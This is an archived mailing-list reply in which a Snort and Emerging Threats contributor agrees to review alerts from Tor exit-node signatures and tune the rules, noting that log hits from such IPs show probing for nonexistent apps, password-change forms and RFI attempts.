Re: [Emerging-Sigs] [Snort-sigs] Snort rules against traffic from Tor

[Matt Jonkman <jonkman () jonkmans com>]

Frank Knobbe wrote:
> No no, I mean, reviewing the alerts generated by inbound TOR sigs and
> checking if there are SQL injection or other attacks that the regular
> didn't alert on

Ahh ya. That's a very good idea. What I've been doing out of curiousity
so far is grepping my apache logs for the IPs that trip tor exit nodes
but nothing else, and so far they're all very obvious bad stuff. Looking
for apps that don't exist, pass change forms, rfi's etc.

Will look closer and see where we can tune rules to make sure there are
hits where appropriate.

Good idea frank!

Mat


> -Frank
>
>
>
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs () emergingthreats net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc



------------------------------------------------------------------------------
SF.Net email is Sponsored by MIX09, March 18-20, 2009 in Las Vegas, Nevada.
The future of the web can't happen without you.  Join us at MIX09 to help
pave the way to the Next Web now. Learn more and register at
http://ad.doubleclick.net/clk;208669438;13503038;i?http://2009.visitmix.com/
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users